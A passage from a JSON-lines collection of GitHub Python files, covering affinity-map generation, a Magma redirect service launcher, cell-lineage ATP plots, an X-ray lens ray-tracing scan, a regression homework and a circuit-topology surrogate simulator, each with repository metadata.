affs0 = np.zeros_like(labels[0], dtype=np.float32)\r\n else:\r\n affs0 = gen_affs(labels[i-1], labels[i], dir=0, shift=shift, padding=padding, background=background)\r\n affs1 = gen_affs(labels[i], None, dir=1, shift=shift, padding=padding, background=background)\r\n affs2 = gen_affs(labels[i], None, dir=2, shift=shift, padding=padding, background=background)\r\n affs = np.stack([affs0, affs1, affs2], axis=0)\r\n out.append(affs)\r\n out = np.asarray(out, dtype=np.float32)\r\n out = np.transpose(out, (1, 0, 2, 3))\r\n return out\r\n\r\ndef gen_affs_mutex_3d(labels, shift=[[-1, 0, 0], [0, -1, 0], [0, 0, -1]], padding=True, background=False):\r\n affs = []\r\n for shift_k in shift:\r\n affs_k = []\r\n for i in range(labels.shape[0]):\r\n if shift_k[0] != 0:\r\n if i == 0:\r\n if padding:\r\n temp = gen_affs_mutex(labels[0], labels[1], shift=shift_k, padding=padding, background=background)\r\n else:\r\n temp = np.zeros_like(labels[0], dtype=np.float32)\r\n else:\r\n temp = gen_affs_mutex(labels[i-1], labels[i], shift=shift_k, padding=padding, background=background)\r\n else:\r\n temp = gen_affs_mutex(labels[i], labels[i], shift=shift_k, padding=padding, background=background)\r\n affs_k.append(temp)\r\n affs.append(affs_k)\r\n affs = np.asarray(affs)\r\n return affs\r\n","repo_name":"ydchen0806/PromptTTA","sub_path":"utils/affinity_ours.py","file_name":"affinity_ours.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"40688602513","text":"import logging\nimport threading\n\nfrom lte.protos.mconfig import mconfigs_pb2\nfrom magma.common.sentry import sentry_init\nfrom magma.common.service import MagmaService\nfrom magma.configuration.service_configs import get_service_config_value\nfrom magma.redirectd.redirect_server import run_flask\n\n\ndef main():\n \"\"\"\n main() for redirectd. Starts the server threads.\n \"\"\"\n service = MagmaService('redirectd', mconfigs_pb2.RedirectD())\n\n # Optionally pipe errors to Sentry\n sentry_init(service_name=service.name, sentry_mconfig=service.shared_mconfig.sentry_config)\n\n redirect_ip = get_service_config_value(\n 'pipelined',\n 'bridge_ip_address', None,\n )\n if redirect_ip is None:\n logging.error(\"ERROR bridge_ip_address not found in pipelined config\")\n service.close()\n return\n\n http_port = service.config['http_port']\n exit_callback = get_exit_server_thread_callback(service)\n run_server_thread(run_flask, redirect_ip, http_port, exit_callback)\n\n # Run the service loop\n service.run()\n\n # Cleanup the service\n service.close()\n\n\ndef get_exit_server_thread_callback(service):\n def on_exit_server_thread():\n service.StopService(None, None)\n\n return on_exit_server_thread\n\n\ndef run_server_thread(target, ip, port, exit_callback):\n \"\"\" Start redirectd service server thread \"\"\"\n thread = threading.Thread(\n target=target,\n args=(ip, port, exit_callback),\n )\n thread.daemon = True\n thread.start()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"magma/magma","sub_path":"lte/gateway/python/magma/redirectd/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":1605,"dataset":"github-code","pt":"6"} +{"seq_id":"39414016064","text":"# coding: utf-8\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nfrom sklearn import linear_model\n\nimport statistics\nimport os\nimport pyCellLineage as myPackage\n\nmodes = ['last']\nconds = ['glc_rich', 'glc_poor']\nroot = os.path.join(os.path.dirname(myPackage.__file__), \"Data\")\nsetlimFreq = 250\nsetlimAmp = 25\natpmax = 10\nthr = {\n \"glc_poor\": {\n \"sample1\": 3.46927206,\n \"sample2\": 3.46927206,\n \"sample3\": 3.46927206,\n },\n \"glc_rich\": {\n \"sample1\": 3.46927206,\n \"sample2\": 3.46927206,\n \"sample3\": 3.46927206,\n }\n}\n\nallAmps = {}\nallFreqs = {}\nallCAmps = {}\nallCfreqs = {}\n\nfor cond in conds:\n sampleDFs = {}\n sampleDFs2 = {}\n\n for i in range(1, 4):\n dfPath = os.path.join(root, cond, \"sample\" + str(i), \"atpAmp.csv\")\n dfPath2 = os.path.join(root, cond, \"sample\" + str(i), \"atpFreq.csv\")\n print(dfPath)\n\n if os.path.isfile(dfPath) and os.path.isfile(dfPath2):\n print(dfPath)\n sampleDFs[\"sample\" + str(i)] = pd.read_csv(dfPath)\n\n sampleDFs2[\"sample\" + str(i)] = pd.read_csv(dfPath2)\n allAmps[cond] = sampleDFs\n allFreqs[cond] = sampleDFs2\n\nfor mode in modes:\n for cond in conds:\n condAmp = None\n tmp = allAmps[cond]\n atpClass = []\n\n for sample in sorted(tmp.keys()):\n if sample == 'sample1':\n condAmp = tmp[sample].copy()\n else:\n condAmp = pd.concat([condAmp, tmp[sample]])\n\n for atp in tmp[sample][mode + 'ATP']:\n if atp >= thr[cond][\"sample\" + str(i)]:\n name = \"high\"\n else:\n name = \"low\"\n atpClass.append(name)\n\n condAmp['ClassATP'] = atpClass\n maxmed = abs(condAmp['maxATP'] - condAmp['medianATP'])\n minmed = abs(condAmp['minATP'] - condAmp['medianATP'])\n condAmp['diffATP'] = pd.DataFrame(\n np.where(maxmed > minmed, maxmed, minmed))\n print([maxmed, minmed, condAmp[mode + 'ATP']])\n\n condFreq = None\n tmp = allFreqs[cond]\n\n for sample in sorted(tmp.keys()):\n if sample == 'sample1':\n condFreq = tmp[sample].copy()\n else:\n condFreq = pd.concat([condFreq, tmp[sample]])\n condFreq['diffATP'] = condAmp[mode + 'ATP']\n condFreq['ClassATP'] = condAmp['ClassATP']\n\n #plt.scatter(condAmp['ClassATP'],condAmp['maxAmp'])\n plt.boxplot([\n condAmp[condAmp['ClassATP'] == \"high\"]['maxAmp'],\n condAmp[condAmp['ClassATP'] == \"low\"]['maxAmp']\n ],\n labels=['high', 'low'])\n r, pvalue = stats.mannwhitneyu(\n condAmp[condAmp['ClassATP'] == \"high\"]['maxAmp'],\n condAmp[condAmp['ClassATP'] == \"low\"]['maxAmp'],\n alternative='two-sided')\n plt.title(cond + \" p: \" + str(pvalue))\n plt.ylim((0, setlimAmp))\n plt.xlabel('ATP Class')\n plt.ylabel('Maximum Amplitude')\n plt.savefig(\n os.path.join(root, 'Total', cond + \"_\" + mode + \"ClassAmp.pdf\"))\n plt.show()\n\n #plt.scatter(condFreq['ClassATP'],condFreq['maxFreq'])\n plt.boxplot([\n condFreq[condFreq['ClassATP'] == \"high\"]['maxFreq'],\n condFreq[condFreq['ClassATP'] == \"low\"]['maxFreq']\n ],\n labels=['high', 'low'])\n r, pvalue = stats.mannwhitneyu(\n condFreq[condFreq['ClassATP'] == \"high\"]['maxFreq'],\n condFreq[condFreq['ClassATP'] == \"low\"]['maxFreq'],\n alternative='two-sided')\n plt.title(cond + \" p: \" + str(pvalue))\n plt.ylim((0, setlimFreq))\n plt.xlabel('ATP Class')\n plt.ylabel('Maximum Frequency')\n\n plt.savefig(\n os.path.join(root, 'Total', cond + \"_\" + mode + \"ClassFreq.pdf\"))\n plt.show()\n","repo_name":"funalab/pyCellLineage","sub_path":"Data/SuplFigCode/Osscilatory_PlotSample.py","file_name":"Osscilatory_PlotSample.py","file_ext":"py","file_size_in_byte":3919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"38750280033","text":"import torch\nfrom discrepancy import *\n\n\ndef offline(trloader, ext, classifier, head, class_num=10):\n ext.eval()\n \n feat_stack = [[] for i in range(class_num)]\n ssh_feat_stack = [[] for i in range(class_num)]\n\n with torch.no_grad():\n for batch_idx, (inputs, labels) in enumerate(trloader):\n\n feat = ext(inputs.cuda())\n predict_logit = classifier(feat)\n ssh_feat = head(feat)\n \n pseudo_label = predict_logit.max(dim=1)[1]\n\n for label in pseudo_label.unique():\n label_mask = pseudo_label == label\n feat_stack[label].extend(feat[label_mask, :])\n ssh_feat_stack[label].extend(ssh_feat[label_mask, :])\n ext_mu = []\n ext_cov = []\n ext_all = []\n\n ssh_mu = []\n ssh_cov = []\n ssh_all = []\n for feat in feat_stack:\n ext_mu.append(torch.stack(feat).mean(dim=0))\n ext_cov.append(covariance(torch.stack(feat)))\n ext_all.extend(feat)\n \n for feat in ssh_feat_stack:\n ssh_mu.append(torch.stack(feat).mean(dim=0))\n ssh_cov.append(covariance(torch.stack(feat)))\n ssh_all.extend(feat)\n \n ext_all = torch.stack(ext_all)\n ext_all_mu = ext_all.mean(dim=0)\n ext_all_cov = covariance(ext_all)\n\n ssh_all = torch.stack(ssh_all)\n ssh_all_mu = ssh_all.mean(dim=0)\n ssh_all_cov = covariance(ssh_all)\n return ext_mu, ext_cov, ssh_mu, ssh_cov, ext_all_mu, ext_all_cov, ssh_all_mu, ssh_all_cov\n","repo_name":"Gorilla-Lab-SCUT/TTAC","sub_path":"cifar/offline.py","file_name":"offline.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"6"} +{"seq_id":"13575710532","text":"from typing import List\nfrom xrt.backends.raycing.sources import GeometricSource, Beam\nfrom xrt.backends.raycing import BeamLine\nfrom xrt.backends.raycing.materials import Material\nfrom database.PrismaticLens import PrismaticLens\nfrom xrt.backends.raycing.screens import Screen\nfrom xrt.plotter import XYCAxis, XYCPlot\nfrom xrt.backends.raycing import get_x, get_z, get_xprime, get_zprime\nfrom utilits.xrtutils import get_integral_breadth, bell_fit\nimport xrt.backends.raycing.materials as rm\n\nimport xrt.backends.raycing.run as rrun\nimport xrt.runner as xrtrun\n\nimport numpy as np\nimport os\nimport shutil\nimport pickle\n\nimport matplotlib as mpl\n\nmpl.use('agg')\n\ndata_dir = os.path.join(r\"C:\\Users\\synchrotron\\PycharmProjects\\SKIF\", 'prism_fixed_focus','datasets', 'tmp')\ndata_dir0 = os.path.join(r\"C:\\Users\\synchrotron\\PycharmProjects\\SKIF\", 'prism_fixed_focus','datasets', 'tmp')\n\ncrl_mat = Material('Be', rho=1.848, kind='lens')\ncrl_y_t = 1.2 # 0.6588 # mm\ncrl_y_g = 1.2 # 0.6588 # mm\ncrl_L = 270. # 82.242 # mm\nen = 30000. # eV\n\nfocal_dist = 14000. # mm\nfocal_dist_calc = crl_y_g * crl_y_t / (crl_L * np.real(1. - crl_mat.get_refractive_index(en)))\n# focal_dist = focal_dist_calc\n\n\nclass CrocTestBL(BeamLine):\n def __init__(self, azimuth=0, height=0, alignE='auto'):\n super().__init__(azimuth, height, alignE)\n\n self.name = 'Croc Lens Test BL'\n\n self.GS = GeometricSource(\n name=r\"Gaussian Source\",\n bl=self,\n nrays=10000,\n center=[0, 0, 0],\n distE='lines',\n energies=[en],\n distx='normal',\n disty='flat',\n distz='normal',\n distxprime='flat',\n distzprime='flat',\n dx=.455,\n dy=0.,\n dz=.027,\n dxprime=1e-3,\n dzprime=1e-4\n )\n\n self.LensMat = crl_mat\n print('2F-2F geometry, F = %.01f' % focal_dist)\n print(*[': '.join((str(a), '%.03f' % b)) for a, b in\n PrismaticLens.calc_optimal_params(self.LensMat, focal_dist, en).items()])\n\n self.LensStack = PrismaticLens.make_stack(\n L=crl_L, N=int(crl_L), d=crl_y_t, g_last=0.0, g_first=crl_y_g,\n bl=self,\n center=[0., 2. * focal_dist, 0],\n material=self.LensMat,\n limPhysX=[-100., 100.],\n limPhysY=[-20., 20.],\n )\n\n self.SourceScreen = Screen(\n bl=self,\n name=r\"Source\",\n center=[0, 1., 0],\n )\n self.PreLensScreen = Screen(\n bl=self,\n name=r\"Before lens\",\n center=[0, 2. * focal_dist - 1., 0],\n )\n self.PostLensScreen = Screen(\n bl=self,\n name=r\"After lens\",\n center=[0, 2. * focal_dist + crl_L + 1., 0],\n )\n self.FocusingScreen = Screen(\n bl=self,\n name=r\"Focus\",\n center=[0, 4. * focal_dist, 0],\n )\n self.FScreenStack = []\n self.reset_screen_stack()\n\n def reset_screen_stack(self, y_min=2.1 * focal_dist, y_max=6 * focal_dist, stack_size=20):\n del self.FScreenStack[:]\n self.FScreenStack = [\n Screen(bl=self, name=r\"FSS %.03f\" % y_pos, center=[0, y_pos, 0])\n for y_pos in np.linspace(y_min, y_max, stack_size)\n ]\n\n def reset_LensStack(self, newG ):\n del self.LensStack[:]\n self.LensStack = PrismaticLens.make_stack(\n L=crl_L, N=int(crl_L), d=crl_y_t, g_last=0.0, g_first=newG,\n bl=self,\n center=[0., 2. * focal_dist, 0],\n material=self.LensMat,\n limPhysX=[-100., 100.],\n limPhysY=[-20., 20.],\n )\n\n\ndef run_process(bl: CrocTestBL):\n outDict = dict()\n\n outDict['BeamSourceGlobal'] = bl.GS.shine()\n outDict['BeamM1Local'] = bl.SourceScreen.expose(beam=outDict['BeamSourceGlobal'])\n outDict['BeamM2Local'] = bl.PreLensScreen.expose(beam=outDict['BeamSourceGlobal'])\n\n beamIn = outDict['BeamSourceGlobal']\n for ilens, lens in enumerate(bl.LensStack):\n lglobal, llocal1, llocal2 = lens.double_refract(beamIn, needLocal=True)\n strl = '_{0:02d}'.format(ilens)\n outDict['BeamLensGlobal' + strl] = lglobal\n outDict['BeamLensLocal1' + strl] = llocal1\n outDict['BeamLensLocal2' + strl] = llocal2\n\n llocal2a = Beam(copyFrom=llocal2)\n llocal2a.absorb_intensity(beamIn)\n outDict['BeamLensLocal2a' + strl] = llocal2a\n beamIn = lglobal\n\n outDict['BeamM3Local'] = bl.PostLensScreen.expose(beam=beamIn)\n outDict['BeamM4Local'] = bl.FocusingScreen.expose(beam=beamIn)\n\n for iscreen, screen in enumerate(bl.FScreenStack):\n outDict['BeamFSSLocal_{0:02d}'.format(iscreen)] = screen.expose(beam=beamIn)\n\n bl.prepare_flow()\n return outDict\n\n\nrrun.run_process = run_process\n\n# поделить на 4\n\nfocus_dict = []\n\n\ndef empty_scan(bl: CrocTestBL, plots: List):\n def slice_parabola(a, b, c, m):\n m += 1.\n x0 = -b / (2. * c)\n a_ = a + m * (b * b / (4 * c) - a)\n d = np.sqrt(b * b - 4 * a_ * c)\n x1 = (-b - d) / (2. * c)\n x2 = (-b + d) / (2. * c)\n return x0, x1, x2\n\n ymin, ymax = 2.1 * focal_dist, 6. * focal_dist\n for _ in range(4):\n if os.path.exists(data_dir):\n shutil.rmtree(data_dir)\n os.mkdir(data_dir)\n\n bl.reset_screen_stack(y_min=ymin, y_max=ymax)\n for ii in range(len(plots) - 1, -1, -1):\n if 'BeamFSSLocal' in plots[ii].title:\n del plots[ii]\n\n plots.extend([\n XYCPlot(\n beam='BeamFSSLocal_{0:02d}'.format(iscreen),\n title='BeamFSSLocal_{0:02d}'.format(iscreen),\n persistentName=os.path.join(data_dir, 'BeamFSSLocal_%.03f.pickle' % screen.center[1]),\n saveName=os.path.join(data_dir, 'BeamFSSLocal_%.03f.png' % screen.center[1]),\n aspect='auto',\n xaxis=XYCAxis(label='$x$', unit='mm', data=get_x),\n yaxis=XYCAxis(label='$z$', unit='mm', data=get_z, limits=[-.5, .5]))\n for iscreen, screen in enumerate(bl.FScreenStack)\n ])\n\n yield\n\n # calculating focus position and size\n pos, y_size = [], []\n for f_name in (os.path.join(data_dir, 'BeamFSSLocal_%.03f.pickle' % screen.center[1])\n for screen in bl.FScreenStack):\n with open(f_name, 'rb') as f:\n y_size.append(get_integral_breadth(pickle.load(f), 'y'))\n pos.append(float(os.path.basename(f_name).replace('.pickle', '').replace('BeamFSSLocal_', '')))\n else:\n pos, y_size = np.array(pos), np.array(y_size)\n ii = np.argsort(pos)\n pos, y_size = pos[ii], y_size[ii]\n\n pp = np.polynomial.polynomial.Polynomial.fit(pos, y_size, 2)\n coef = pp.convert().coef\n focus, ymin, ymax = slice_parabola(*coef, 0.1)\n fig = mpl.pyplot.figure()\n ax = fig.add_subplot()\n ax.plot(pos, y_size)\n ax.plot(pos, pp(pos))\n ax.plot([focus, focus], [y_size.min(), y_size.max()], '--')\n ax.text(focus, y_size.max(), 'F=%.01f mm' % focus)\n fig.savefig(os.path.join(data_dir, '..', f'crl_y_t {crl_y_t} {en}eV_fdist%d.png' % _))\n\n focus_dict.append(focus / 4)\n # calculating gain\n focus_size = coef[0] - coef[1] ** 2 / (4. * coef[2])\n with open(f_name, 'rb') as f:\n f = pickle.load(f)\n focus_flux = f.intensity\n with open(os.path.join(data_dir, 'BeamAtSource.pickle'), 'rb') as f:\n f = pickle.load(f)\n source_flux = f.intensity\n source_size = get_integral_breadth(f, 'y')\n\n source_projection = source_size + 2. * focus * 1e-4\n print('Focus | size: %.03f | flux %.01f | distance %.01f' % (focus_size, focus_flux, focus))\n print('Source | size: %.03f | flux %.01f' % (source_size, source_flux))\n print('Projected source size: %.03f' % source_projection)\n print('Gain %.01f' % ((focus_flux * source_projection) / (source_flux * focus_size)))\n\ndel_focus=[]\ndef yg_scan(bl: CrocTestBL, plots: List):\n focal_dist=14000\n def slice_parabola(a, b, c, m):\n m += 1.\n x0 = -b / (2. * c)\n a_ = a + m * (b * b / (4 * c) - a)\n d = np.sqrt(b * b - 4 * a_ * c)\n x1 = (-b - d) / (2. * c)\n x2 = (-b + d) / (2. * c)\n return x0, x1, x2\n newG=round(focal_dist *crl_L/crl_y_t*np.real(1. - crl_mat.get_refractive_index(en)),3)\n bl.reset_LensStack(newG)\n # ymin, ymax = 2.1 *focal_dist, 6. * focal_dist\n\n for _ in range(20):\n ymin, ymax = 54000,58000\n if os.path.exists(data_dir):\n shutil.rmtree(data_dir)\n os.mkdir(data_dir)\n\n bl.reset_screen_stack(y_min=ymin, y_max=ymax, stack_size=100)\n\n for ii in range(len(plots) - 1, -1, -1):\n if 'BeamFSSLocal' in plots[ii].title:\n del plots[ii]\n\n plots.extend([\n XYCPlot(\n beam='BeamFSSLocal_{0:02d}'.format(iscreen),\n title='BeamFSSLocal_{0:02d}'.format(iscreen),\n persistentName=os.path.join(data_dir, 'BeamFSSLocal_%.03f.pickle' % screen.center[1]),\n saveName=os.path.join(data_dir, 'BeamFSSLocal_%.03f.png' % screen.center[1]),\n aspect='auto',\n xaxis=XYCAxis(label='$x$', unit='mm', data=get_x),\n yaxis=XYCAxis(label='$z$', unit='mm', data=get_z, limits=[-.5, .5]))\n for iscreen, screen in enumerate(bl.FScreenStack)\n ])\n\n yield\n\n # calculating focus position and size\n pos, y_size = [], []\n for f_name in (os.path.join(data_dir, 'BeamFSSLocal_%.03f.pickle' % screen.center[1])\n for screen in bl.FScreenStack):\n with open(f_name, 'rb') as f:\n y_size.append(get_integral_breadth(pickle.load(f), 'y'))\n pos.append(float(os.path.basename(f_name).replace('.pickle', '').replace('BeamFSSLocal_', '')))\n else:\n pos, y_size = np.array(pos), np.array(y_size)\n ii = np.argsort(pos)\n pos, y_size = pos[ii], y_size[ii]\n\n pp = np.polynomial.polynomial.Polynomial.fit(pos, y_size, 2)\n coef = pp.convert().coef\n realfocus, ymin, ymax = slice_parabola(*coef, 0.1)\n del_focus.append(4*focal_dist-realfocus)\n\n fig = mpl.pyplot.figure()\n ax = fig.add_subplot()\n ax.plot(pos, y_size)\n ax.plot(pos, pp(pos))\n ax.set_xlabel(\"E , eV\")\n ax.set_ylabel(\"y_size, мм\")\n ax.plot([realfocus, realfocus], [y_size.min(), y_size.max()], '--')\n ax.text(realfocus, y_size.max(), 'F=%.01f mm' % realfocus)\n mpl.pyplot.title(label=f'y_g={newG}мм, Энергия {en}')\n fig.savefig(os.path.join(data_dir, '..', f'crl_y_g {newG} {en}eV_fdist%d.png' % _))\n print(f'Energy {en} эВ')\n print(f'newG {newG} мм')\n print(f'del_focus={del_focus[_]} мм')\n print(f'abs(focal_dist-real_focus)/focal_dist={abs(del_focus[_]) / (4*focal_dist)}')\n if abs(del_focus[_]/(4*focal_dist))<=0.01:\n\n break\n\n # ymin, ymax = realfocus - 2 * (abs(del_focus[_])), realfocus - 2 * (abs(del_focus[_]))\n newG=round(newG*(1+(del_focus[_])/(4*focal_dist)),3)\n bl.reset_LensStack(newG)\n\n focus_dict.append(realfocus)\n print(f' Фокусное расстояние {focal_dist}мм при {en} еВ и y_g={newG} мм')\n # calculating gain\n focus_size = coef[0] - coef[1] ** 2 / (4. * coef[2])\n with open(f_name, 'rb') as f:\n f = pickle.load(f)\n focus_flux = f.intensity\n with open(os.path.join(data_dir, 'BeamAtSource.pickle'), 'rb') as f:\n f = pickle.load(f)\n source_flux = f.intensity\n source_size = get_integral_breadth(f, 'y')\n\n source_projection = source_size + 2. * realfocus * 1e-4\n print('Focus | size: %.03f | flux %.01f | distance %.01f' % (focus_size, focus_flux, realfocus))\n print('Source | size: %.03f | flux %.01f' % (source_size, source_flux))\n print('Projected source size: %.03f' % source_projection)\n print('Gain %.01f' % ((focus_flux * source_projection) / (source_flux * focus_size)))\n\n\nif __name__ == '__main__':\n Emap = np.linspace(20000, 80000, 10)\n crl_y_t_map = np.linspace(0.5, 5, 10)\n focus_formula = []\n for tempE in Emap:\n en=round(tempE,3)\n # crl_y_t = temp_crl_y_t\n # focal_dist_calc = crl_y_g * crl_y_t / (crl_L * np.real(1. - crl_mat.get_refractive_index(en)))\n # focal_dist = focal_dist_calc\n data_dir = os.path.join(data_dir0, f'зависимость от en-{en}')\n if os.path.exists(data_dir):\n shutil.rmtree(data_dir)\n os.mkdir(data_dir)\n plots = [\n XYCPlot(beam='BeamM1Local', title='source', aspect='auto',\n xaxis=XYCAxis(label='$x$', unit='mm', data=get_x),\n yaxis=XYCAxis(label='$z$', unit='mm', data=get_z),\n persistentName=os.path.join(data_dir, 'BeamAtSource.pickle')),\n XYCPlot(beam='BeamM2Local', title='before_lens', aspect='auto',\n xaxis=XYCAxis(label='$x$', unit='mm', data=get_x),\n yaxis=XYCAxis(label='$z$', unit='mm', data=get_z)),\n XYCPlot(beam='BeamM3Local', title='after_lens', aspect='auto',\n xaxis=XYCAxis(label='$x$', unit='mm', data=get_x),\n yaxis=XYCAxis(label='$z$', unit='mm', data=get_z)),\n XYCPlot(beam='BeamM3Local', title='focal_point', aspect='auto',\n xaxis=XYCAxis(label='$x$', unit='mm', data=get_x),\n yaxis=XYCAxis(label='$z$', unit='mm', data=get_z))\n ]\n beamline = CrocTestBL()\n scan = yg_scan\n show = False\n repeats = 1\n\n if show:\n beamline.glow(\n scale=[1e1, 1e4, 1e4],\n centerAt=r'Lens_03_Exit',\n generator=scan,\n generatorArgs=[beamline, plots],\n startFrom=1\n )\n else:\n xrtrun.run_ray_tracing(\n beamLine=beamline,\n plots=plots,\n repeats=repeats,\n backend=r\"raycing\",\n generator=scan,\n generatorArgs=[beamline, plots]\n )\n\n focus_formula.append(focal_dist_calc)\n fig = mpl.pyplot.figure()\n ax = fig.add_subplot()\n ax.set_xlabel(\"E , eV\")\n ax.set_ylabel(\"Фокусное расстояние, мм\")\n ax.plot(Emap, focus_dict, 'x', label='xrt')\n ax.plot(Emap, [56000 for i in range(len(Emap))], label='analitic')\n ax.legend()\n fig.savefig(os.path.join(data_dir, '..', 'focus(E ).png'))","repo_name":"Kutkin-Oleg/SKIF","sub_path":"Playground/prysm_fixed_focus.py","file_name":"prysm_fixed_focus.py","file_ext":"py","file_size_in_byte":14803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"41645715338","text":"#!/usr/bin/env python3\n\n# James Jessen\n# CptS 434 - Assignment 4\n# Due 2019-10-01\n\nimport pandas as pd\nimport numpy as np\n\ndef perceptronClassification(dataPath, inputColumns, classColumn):\n # print(\"Input Columns: {}\".format(inputColumns))\n # print(\"Class Column: {}\".format(classColumn))\n\n columns = inputColumns.copy()\n columns.append(classColumn)\n\n # Read data from file\n # Read CSV: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_csv.html\n # DataFrame: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html\n data = pd.read_csv(dataPath, usecols=columns)\n\n data.loc['actual']\n data.loc['predicted']\n\n numInputs = len(inputColumns)\n numRows = len(data.index)\n\n V = np.ones((numRows, 1 + numInputs)) # First column ones for bias node\n V[:,1:] = data.iloc[:,inputColumns].values\n \n classifications = data.iloc[:,classColumn].values\n\n # Solve the normal equation\n w = np.linalg.solve(V.T.dot(V), V.T.dot(classifications))\n\n fits = V.dot(w)\n yAvg = np.mean(classifications)\n\n # Sum of Squares Regression\n # Measures variability of fit from mean response.\n ssrDiff = fits - yAvg\n SSR = np.sum(ssrDiff.dot(ssrDiff))\n\n # Sum of Squares Error\n # Measures variability of response from all other sources after the linear relationship \n # between response and attributes has been accounted for.\n residuals = classifications - fits # Deviations predicted from actual empirical values of data\n SSE = np.sum(residuals.dot(residuals))\n\n # Sum of Squares Total \n # The sum of the squared differences of each observation from the overall mean.\n # Identity: SST = SSR + SSE\n delY = classifications - yAvg\n SST = np.sum(delY.dot(delY))\n\n # Coefficient of Determination\n # Interpreted as the fraction of the total variation of response over \n # the dataset that is explained by the linear fit.\n rSq = SSR / SST\n # Always increases when an additional attribute is included.\n # To be useful, a new attribute must significantly increase R2.\n\n # Mean Squared Error\n MSE = SSE / (numRows - numInputs - 1)\n\n # Standard Error of Estimation\n # Interpreted as the typical size of residuals \n s = np.sqrt(MSE)\n # Can be lower or higher when another attribute is added to the model.\n\n return classifications, fits, rSq","repo_name":"jsjessen/434_NeuralNetworks","sub_path":"4hw/PerceptronClassification.py","file_name":"PerceptronClassification.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27815647970","text":"import copy\nfrom abc import abstractmethod, ABC\n\nimport config\n\nif config.task == 'uct_3_comp':\n from UCFTopo_dev.ucts.TopoPlanner import TopoGenSimulator, calculate_reward, sort_dict_string\nelif config.task == 'uct_5_comp':\n from UCT_5_UCB_unblc_restruct_DP_v1.ucts.TopoPlanner import TopoGenSimulator, calculate_reward, sort_dict_string\n from UCT_5_UCB_unblc_restruct_DP_v1.SimulatorAnalysis.gen_topo import key_circuit_from_lists, convert_to_netlist\n\nfrom topo_data_util.analysis.topoGraph import TopoGraph\nfrom topo_data_util.analysis.graphUtils import nodes_and_edges_to_adjacency_matrix\n\n\nclass SurrogateRewardTopologySim(TopoGenSimulator, ABC):\n def __init__(self, debug, *args):\n self.debug = debug\n # for fair comparison with simulator, create a hash table here\n self.surrogate_hash_table = {}\n self.no_isom_seen_state_list = []\n\n super().__init__(*args)\n\n def find_paths(self):\n \"\"\"\n Useful for GP and transformer based surrogate model\n Return the list of paths in the current state\n e.g. ['VIN - inductor - VOUT', ...]\n \"\"\"\n node_list, edge_list = self.get_state().get_nodes_and_edges()\n\n adjacency_matrix = nodes_and_edges_to_adjacency_matrix(node_list, edge_list)\n\n # convert graph to paths, and find embedding\n topo = TopoGraph(adj_matrix=adjacency_matrix, node_list=node_list, new_repr=True)\n return topo.find_end_points_paths_as_str()\n\n def get_topo_key(self, state=None):\n \"\"\"\n the key of topology used by hash table\n\n :return: the key representation of the state (self.current if state == None)\n \"\"\"\n if state is None:\n state = self.get_state()\n\n if config.task == 'uct_3_comp':\n topo_key = sort_dict_string(state.graph)\n elif config.task == 'uct_5_comp':\n list_of_node, list_of_edge, netlist, joint_list = convert_to_netlist(state.graph,\n state.component_pool,\n state.port_pool,\n state.parent,\n state.comp2port_mapping)\n topo_key = key_circuit_from_lists(list_of_edge, list_of_node, netlist)\n else:\n raise Exception()\n\n return topo_key\n\n def get_reward(self, state=None):\n if not self.configs_['sweep']:\n return self.get_no_sweep_reward()\n else:\n return self.get_sweep_reward_with_para()\n\n def get_no_sweep_reward(self):\n reward = self.get_reward_using_gnn()\n return reward\n\n def get_sweep_reward_with_para(self):\n tmp_para = -1\n tmp_max_reward = -1\n for duty_cycle in self.candidate_duty_cycles:\n self.current.parameters = duty_cycle\n reward = self.get_reward_using_gnn()\n if tmp_max_reward < reward:\n tmp_max_reward = reward\n tmp_para = duty_cycle\n self.current.parameters = tmp_para\n return tmp_max_reward\n\n def get_reward_using_gnn(self, state=None):\n \"\"\"\n Use surrogate reward function\n imp-wise, not sure why keeping a reward attribute\n \"\"\"\n\n if state is not None:\n self.set_state(None, None, state)\n\n if not self.is_terminal():\n self.current.parameters = -1\n self.reward = 0\n return self.reward\n\n if not self.current.graph_is_valid():\n self.current.parameters = -1\n self.reward = 0\n self.effi = 0\n self.vout = -500\n return self.reward\n\n topo_key = self.get_topo_key()\n if topo_key + '$' + str(self.current.parameters) in self.surrogate_hash_table:\n self.hash_counter += 1\n return self.surrogate_hash_table[topo_key + '$' + str(self.current.parameters)]\n else:\n if self.configs_['skip_sim'] and \\\n (topo_key + '$' + str(self.current.parameters) not in self.key_sim_effi_):\n reward = 0\n effi_info = {'efficiency': 0, 'Vout': 500}\n tmp_para = self.current.parameters\n eff = effi_info['efficiency']\n vout = effi_info['Vout']\n parameter = self.current.parameters\n print('skip as not in sim hash')\n else:\n\n # eff = self.get_surrogate_eff(self.get_state())\n # vout = self.get_surrogate_vout(self.get_state())\n eff, vout, reward, parameter = self.get_surrogate_reward(self.get_state())\n # reward_sim, effi_sim, vout_sim = self.get_true_performance(self.get_state())\n # print('gnn effi:', eff, ' vout:', vout, ' reward:', reward)\n # print('simulation effi:', effi_sim, ' vout:', vout_sim, ' reward:', reward_sim)\n # # an object for computing reward\n # eff_obj = {'efficiency': eff,\n # 'output_voltage': vout}\n\n self.query_counter += 1\n self.reward = reward\n\n if self.debug:\n print('estimated reward {}, eff {}, vout {}'.format(self.reward, eff, vout))\n print('true performance {}'.format(self.get_true_performance()))\n\n self.surrogate_hash_table[topo_key + '$' + str(self.current.parameters)] = self.reward\n print(topo_key, eff, vout, reward, parameter)\n if self.configs_['sweep']:\n self.update_topk(topo_key)\n else:\n self.update_topk_topology_with_para(topo_key + '$' + str(self.current.parameters))\n self.no_isom_seen_state_list.append(copy.deepcopy(self.current))\n\n return 